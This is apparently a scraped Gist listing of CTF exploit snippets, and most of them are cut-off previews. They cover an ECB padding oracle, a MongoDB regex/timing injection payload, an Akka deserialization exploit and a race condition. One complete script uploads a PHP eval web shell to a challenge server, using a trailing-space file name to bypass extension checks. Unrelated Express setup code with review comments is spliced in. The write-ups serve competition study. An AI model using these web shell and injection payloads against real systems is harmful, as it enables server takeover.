
LongCat pich4ya

pich4ya / enter_the_dungeon1.py
Last active April 2, 2018 12:42
SwampCTF 2018 - Locked Dungeon
#!/usr/bin/env python
# SwampCTF 2018 - Locked Dungeon
# https://play.swampctf.com/
import argparse
from hashlib import sha256
from Crypto.Cipher import AES
import os
import sys
// Preview of an Express application's setup code. The listing is cut off after
// the connection string, so the route handlers are not visible here.
var express = require('express')
var app = express()
var bodyParser = require('body-parser')
// Parse application/x-www-form-urlencoded request bodies into req.body.
// NOTE(review): no `extended` option is given. In body-parser 1.x that falls
// back to extended (qs) parsing, where bracketed keys such as a[b]=c become
// nested objects. If req.body fields are later passed into MongoDB queries,
// each field should first be checked to be a plain string - confirm against
// the handlers, which are not shown.
app.use(bodyParser.urlencoded({}));
var path = require("path");
var moment = require('moment');
var MongoClient = require('mongodb').MongoClient;
// Connection string for a MongoDB instance on the local host. It carries no
// credentials, so access control (if any) must come from elsewhere - confirm.
var url = "mongodb://localhost:27017/";
pich4ya / ecb_padding_exploit.py
Created April 2, 2018 12:39
SwampCTF 2018 - Locked Dungeon Writeup
from pwn import *
import string
s = remote('chal1.swampctf.com', 1450)
flag=''
for j in xrange(1,60):
s.send('a'*(47-len(flag))+'\n')
checker = s.recvline().strip()
pich4ya / loginme_exploit.py
Last active April 3, 2018 16:34
Tencent CTF LoginMe Exploit
# @author LongCat & Bongtrop
import string
import requests
import urllib
# username=admin&password=y&|hex_md5(.)(.)y.(.)....this.password_(\w%2b)|=$2%3d%3d$2$2+%26%26+this.password_$4[0]%3d%3d%3d'1+%26%26+sleex$1100$3+%26%26+$2$2%3d%3d$2
flag=''
for char_counter in xrange(0,100):
for characters in string.letters+string.digits+"{}":
pich4ya / LockedDungeons2.py
Created April 5, 2018 15:30
swamp CTF 2018 - Locked Dungeons-2 (Crypto)
#!/usr/bin/env python2.7
from hashlib import sha256, md5
from Crypto.Cipher import AES
import os
import random
from binascii import hexlify, unhexlify
from base64 import b64decode, b64encode
import sys
pich4ya / index.html
Created April 6, 2018 10:06
loginme
<title>Login</title>
<style>
/*@import url(https://fonts.googleapis.com/css?family=Cutive+Mono);*/
body {
background: #456;
font-family: 'Consolas', sans-serif;
}
pich4ya / hitbxctf2018_upload.py
Created April 14, 2018 07:49
HITB-XCTF 2018 - Upload (Web) Writeup
# @author LongCat (Pichaya Morimoto)
import requests, string
# Upload step of the write-up: send one multipart form to the challenge's
# upload.php and print what the server answers.
#
# On Windows, PHP's move_uploaded_file() converts "foo.php" followed by one or
# more of the characters \x2E (.), \x2F (/), \x5C (\) back to "foo.php".
# http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/
# NOTE(review): the file name sent below ends in a space (\x20), which is not
# in the list above; presumably it relies on the same trailing-character
# normalisation - confirm against the referenced article.
# For the defending side: an extension check on the raw client-supplied name
# and the name the file system finally stores can disagree. Upload handlers
# should generate or canonicalise the stored name before validating it, and
# keep the upload directory non-executable.
# Multipart field "file": (file name, file content).
files = {'file': ('pwn.php ','<?php if(isset($_POST[0])){ eval($_POST[0]); }else{ phpinfo(); } ?>')}
# Ordinary form field sent alongside the file.
values = {'submit': 'upload'}
# POST the form, then strip U+FEFF (BOM) characters and surrounding whitespace
# from both ends of the response body. What the body contains is not visible
# here - presumably the stored path of the upload; confirm.
phpshell = requests.post('http://47.90.97.18:9999/upload.php', files=files, data=values).text.strip(u'\ufeff').strip()
# Python 2 print statement; the script does not run under Python 3 as written.
print phpshell
pich4ya / app.py
Created April 15, 2018 18:26
HITB XCTF 2018 - Python's revenge (Web)
# Python's revenge
# This is a easy python sandbox, can you bypass it and get the flag?
# https://hitbxctf2018.xctf.org.cn/contest_challenge/
from __future__ import unicode_literals
from flask import Flask, request, make_response, redirect, url_for, session
from flask import render_template, flash, redirect, url_for, request
from werkzeug.security import safe_str_cmp
from base64 import b64decode as b64d
from base64 import b64encode as b64e
from hashlib import sha256
/*
akka-actor_2.10-2.3.16.jar
akka-remote_2.10-2.3.16.jar
scala-library_2.10.0.jar
config-1.3.0.jar
protobuf-java-2.6.1.jar
netty-3.10.6.Final.jar
*/
package akkaexploit;
pich4ya / 0ps_CTF2018_easy_user_mgt.py
Created May 5, 2018 22:29
0ps CTF ‘easy user manage system’ task – web (Race Condition bug)
# -- 0ps CTF ‘easy user manage system’ task – web (Race Condition bug)
# https://whit3hat.com/2018/04/05/0ps-ctf-easy-management-web/
# https://whit3hat.com/wp-content/uploads/2018/04/solve.py
from flask import Flask, request
import time
import socket
from os import urandom, remove
import requests
import urllib
import threading